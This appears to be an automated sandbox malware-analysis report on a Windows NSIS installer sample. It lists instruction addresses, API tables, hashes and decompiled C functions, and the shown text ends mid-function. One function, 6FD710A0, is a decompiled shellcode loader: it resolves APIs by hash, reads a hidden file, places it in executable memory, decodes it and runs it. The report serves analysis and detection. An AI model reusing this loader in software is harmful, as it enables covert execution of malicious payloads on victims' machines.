                                                                                    0x00403667
                                                                                    0x0040366d
                                                                                    0x00403672
                                                                                    0x00403796
                                                                                    0x0040379c
                                                                                    0x00403818
                                                                                    0x00403818
                                                                                    0x0040381d
                                                                                    0x00403820
                                                                                    0x00403822
                                                                                    0x00403822
                                                                                    0x0040382a
                                                                                    0x0040382a
                                                                                    0x004037ac
                                                                                    0x004037b4
                                                                                    0x004037b6
                                                                                    0x004037b7
                                                                                    0x004037c4
                                                                                    0x004037d7
                                                                                    0x004037df
                                                                                    0x004037e3
                                                                                    0x004037e3
                                                                                    0x004037eb
                                                                                    0x004037f0
                                                                                    0x004037f7
                                                                                    0x00403805
                                                                                    0x00403807
                                                                                    0x0040380d
                                                                                    0x0040380f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004037f9
                                                                                    0x004037ff
                                                                                    0x00403801
                                                                                    0x00403803
                                                                                    0x00403811
                                                                                    0x00403813
                                                                                    0x00000000
                                                                                    0x00403813
                                                                                    0x00000000
                                                                                    0x00403803
                                                                                    0x004037f7
                                                                                    0x00403681
                                                                                    0x00403688
                                                                                    0x00403688
                                                                                    0x004035da
                                                                                    0x00403652
                                                                                    0x00403652
                                                                                    0x0040365e
                                                                                    0x00000000
                                                                                    0x0040365e
                                                                                    0x004035e3
                                                                                    0x004035e7
                                                                                    0x0040361d
                                                                                    0x0040361d
                                                                                    0x0040361f
                                                                                    0x00403627
                                                                                    0x00403699
                                                                                    0x0040369b
                                                                                    0x004036a2
                                                                                    0x004036aa
                                                                                    0x004036aa
                                                                                    0x004036b5
                                                                                    0x004036ba
                                                                                    0x004036c9
                                                                                    0x004036cd
                                                                                    0x004036ce
                                                                                    0x004036d7
                                                                                    0x004036d0
                                                                                    0x004036d0
                                                                                    0x004036d0
                                                                                    0x004036dd
                                                                                    0x004036e3
                                                                                    0x004036e9
                                                                                    0x004036f1
                                                                                    0x004036f1
                                                                                    0x004036ff
                                                                                    0x00403704
                                                                                    0x00403716
                                                                                    0x0040371e
                                                                                    0x00403724
                                                                                    0x00403730
                                                                                    0x00403736
                                                                                    0x00403740
                                                                                    0x00403756
                                                                                    0x00403767
                                                                                    0x0040376d
                                                                                    0x00403774
                                                                                    0x00403777
                                                                                    0x0040377d
                                                                                    0x0040377d
                                                                                    0x00403774
                                                                                    0x00403781
                                                                                    0x00403787
                                                                                    0x00403787
                                                                                    0x0040378c
                                                                                    0x0040378c
                                                                                    0x00000000
                                                                                    0x004036c9
                                                                                    0x00403629
                                                                                    0x0040362b
                                                                                    0x00403636
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040363e
                                                                                    0x00403649
                                                                                    0x0040364e
                                                                                    0x00000000
                                                                                    0x0040364e
                                                                                    0x00403612
                                                                                    0x00403614
                                                                                    0x00403618
                                                                                    0x0040361b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040361b
                                                                                    0x00000000
                                                                                    0x00403614
                                                                                    0x00403564
                                                                                    0x00403570
                                                                                    0x00403575
                                                                                    0x0040357a
                                                                                    0x0040357c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403584
                                                                                    0x0040358c
                                                                                    0x0040359d
                                                                                    0x004035a5
                                                                                    0x004035a7
                                                                                    0x004035ac
                                                                                    0x004035ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004035ae
                                                                                    0x00000000
                                                                                    0x00403513
                                                                                    0x004034d4
                                                                                    0x004034d7
                                                                                    0x004034da
                                                                                    0x004034e0
                                                                                    0x004034e0
                                                                                    0x004034e0
                                                                                    0x004034e0
                                                                                    0x00000000
                                                                                    0x004034e0
                                                                                    0x004034dc
                                                                                    0x004034de
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004034de
                                                                                    0x0040348f
                                                                                    0x00403492
                                                                                    0x00403495
                                                                                    0x0040349b
                                                                                    0x0040349b
                                                                                    0x00000000
                                                                                    0x0040349b
                                                                                    0x00403497
                                                                                    0x00403499
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403499
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040346a
                                                                                    0x0040346a
                                                                                    0x0040346a
                                                                                    0x0040346b
                                                                                    0x0040346b
                                                                                    0x00000000
                                                                                    0x0040346a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE ref: 0040336D
                                                                                    • GetVersion.KERNEL32 ref: 00403373
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                                    • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                                    • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                                    • GetCommandLineA.KERNEL32(arability Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000020,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                      • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000), ref: 00403924
                                                                                      • Part of subcall function 0040390A: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,73BCFA90), ref: 004039FA
                                                                                      • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                                      • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403A18
                                                                                      • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                                                      • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                                                      • Part of subcall function 00403830: CloseHandle.KERNEL32(000002A8,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                                    • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                                    • ExitProcess.KERNEL32 ref: 00403688
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                                    • ExitProcess.KERNEL32 ref: 0040382A
                                                                                      • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                                                    • String ID: "$"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$arability Setup$~nsu
                                                                                    • API String ID: 1314998376-1673841308
                                                                                    • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                                    • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                                    • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                                                    • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                    0x004058c9
                                                                                    0x004058ce
                                                                                    0x004058d7
                                                                                    0x004058da
                                                                                    0x004058e2
                                                                                    0x004058e5
                                                                                    0x004058e8
                                                                                    0x004058f0
                                                                                    0x004058f2
                                                                                    0x004058f3
                                                                                    0x00000000
                                                                                    0x004058f3
                                                                                    0x004058fe
                                                                                    0x00405901
                                                                                    0x00405901
                                                                                    0x00405901
                                                                                    0x00405905
                                                                                    0x00405918
                                                                                    0x0040591f
                                                                                    0x00405924
                                                                                    0x00405928
                                                                                    0x00405938
                                                                                    0x0040592a
                                                                                    0x00405930
                                                                                    0x00405930
                                                                                    0x0040593d
                                                                                    0x00405940
                                                                                    0x0040594b
                                                                                    0x00405951
                                                                                    0x00405956
                                                                                    0x00405966
                                                                                    0x00405968
                                                                                    0x0040596e
                                                                                    0x00405971
                                                                                    0x00405974
                                                                                    0x00405a2c
                                                                                    0x00405a2c
                                                                                    0x00405a30
                                                                                    0x00405a32
                                                                                    0x00405a32
                                                                                    0x00405a32
                                                                                    0x00405a32
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040597a
                                                                                    0x0040597a
                                                                                    0x00405983
                                                                                    0x00405989
                                                                                    0x0040598e
                                                                                    0x00405991
                                                                                    0x00405993
                                                                                    0x00405997
                                                                                    0x00405999
                                                                                    0x00405999
                                                                                    0x00405997
                                                                                    0x0040599c
                                                                                    0x0040599f
                                                                                    0x004059b2
                                                                                    0x004059b4
                                                                                    0x004059b9
                                                                                    0x004059c0
                                                                                    0x004059db
                                                                                    0x004059e0
                                                                                    0x004059e2
                                                                                    0x00405a06
                                                                                    0x004059e4
                                                                                    0x004059e4
                                                                                    0x004059e7
                                                                                    0x004059fb
                                                                                    0x004059e9
                                                                                    0x004059ec
                                                                                    0x004059f4
                                                                                    0x004059f4
                                                                                    0x004059e7
                                                                                    0x004059c2
                                                                                    0x004059c8
                                                                                    0x004059ca
                                                                                    0x004059d0
                                                                                    0x004059d0
                                                                                    0x004059ca
                                                                                    0x00000000
                                                                                    0x004059c0
                                                                                    0x004059a1
                                                                                    0x004059a4
                                                                                    0x004059a6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004059a8
                                                                                    0x004059aa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004059ac
                                                                                    0x004059b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a0b
                                                                                    0x00405a15
                                                                                    0x00405a1b
                                                                                    0x00405a1b
                                                                                    0x00405a26
                                                                                    0x00000000
                                                                                    0x00405a26
                                                                                    0x00405942
                                                                                    0x00405949
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405907
                                                                                    0x00405907
                                                                                    0x00405909
                                                                                    0x00405a36
                                                                                    0x00405a38
                                                                                    0x00405a3b
                                                                                    0x00405a8c
                                                                                    0x00405a8c
                                                                                    0x00405a8c
                                                                                    0x00405a3d
                                                                                    0x00405a40
                                                                                    0x00405a4b
                                                                                    0x00405a50
                                                                                    0x00405a52
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a55
                                                                                    0x00405a61
                                                                                    0x00405a66
                                                                                    0x00405a68
                                                                                    0x00000000
                                                                                    0x00405a83
                                                                                    0x00405a6a
                                                                                    0x00405a6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a72
                                                                                    0x00000000
                                                                                    0x00405a79
                                                                                    0x00405a42
                                                                                    0x00405a42
                                                                                    0x00000000
                                                                                    0x00405a42
                                                                                    0x0040590f
                                                                                    0x00405912
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405912

                                                                                    APIs
                                                                                    • DeleteFileA.KERNELBASE(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                                    • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                                    • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 004058BF
                                                                                    • \*.*, xrefs: 0040592A
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                    • API String ID: 2035342205-497949629
                                                                                    • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                                    • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                                    • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                                    • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 6FD710A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 65%
                                                                                    			E6FD710A0(void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v536;
				intOrPtr* _t24;
				void* _t33;
				void* _t34;
				void* _t37;
				void* _t46;
				void* _t52;

				_v8 = 0;
				_t51 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				_v12 = E6FD71000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8a111d91);
				_t24 = E6FD71000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xa4f84a9a);
				_v16 = E6FD71000(_t51, 0x433a3842);
				E6FD71000(_t51, 0xa5f15738);
				 *((intOrPtr*)(E6FD71000(_t51, 0xcbec1a0)))();
				 *_t24( &_v536, L"\\fmkr8rw7aiu", 0x103,  &_v536);
				_t33 = CreateFileW( &_v536, 0x80000000, 7, 0, 3, 0x80, 0);
				_t34 = VirtualAlloc(0, 0x1a05, 0x3000, 0x40); // executed
				_t52 = _t34;
				ReadFile(_t33, _t52, 0x1a05,  &_v8, 0);
				_t46 = 0;
				if(_v8 > 0) {
					do {
						asm("ror dl, 1");
						asm("rol dl, 1");
						 *(_t52 + _t46) =  !( !(_t46 - (0x000000b4 -  *(_t52 + _t46) + _t46 ^ 0x00000078) + 0x00000001 ^ 0x000000e9) - _t46);
						_t46 = _t46 + 1;
					} while (_t46 < _v8);
				}
				_t37 =  *_t52(); // executed
				return _t37;
			}













                                                                                    0x6fd710ac
                                                                                    0x6fd710c6
                                                                                    0x6fd710d9
                                                                                    0x6fd710dc
                                                                                    0x6fd710f4
                                                                                    0x6fd710f7
                                                                                    0x6fd7111b
                                                                                    0x6fd71129
                                                                                    0x6fd71144
                                                                                    0x6fd71157
                                                                                    0x6fd7115b
                                                                                    0x6fd71168
                                                                                    0x6fd7116b
                                                                                    0x6fd71170
                                                                                    0x6fd71172
                                                                                    0x6fd71179
                                                                                    0x6fd71180
                                                                                    0x6fd7118e
                                                                                    0x6fd71191
                                                                                    0x6fd71192
                                                                                    0x6fd71172
                                                                                    0x6fd71197
                                                                                    0x6fd7119f

                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FD71144
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001A05,00003000,00000040), ref: 6FD71157
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00001A05,00000000,00000000), ref: 6FD71168
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.659130395.000000006FD71000.00000020.00020000.sdmp, Offset: 6FD70000, based on PE: true
                                                                                    • Associated: 00000000.00000002.659123000.000000006FD70000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.659152314.000000006FD72000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AllocCreateReadVirtual
                                                                                    • String ID: \fmkr8rw7aiu
                                                                                    • API String ID: 3585551309-3367158975
                                                                                    • Opcode ID: 3c45c23c9c9571d778a8c2428821ce29e25e1b54fba57198f3e03524e431a930
                                                                                    • Instruction ID: fe2735157941c9f5fc62cf0389a5855a6818715355d2810d23aff66e1eb7dfa6
                                                                                    • Opcode Fuzzy Hash: 3c45c23c9c9571d778a8c2428821ce29e25e1b54fba57198f3e03524e431a930
                                                                                    • Instruction Fuzzy Hash: 66212C35A40308BFE720D7B48C95FDEB7B8EF55B55F500199F604EB280DA747A049B61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}




                                                                                    0x00406476
                                                                                    0x0040647f
                                                                                    0x00000000
                                                                                    0x0040648c
                                                                                    0x00406482
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNELBASE(73BCFA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                                    • FindClose.KERNEL32(00000000), ref: 00406482
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                    • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                                    • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                    • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040390A, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890;
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406055("1033", _t67 & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
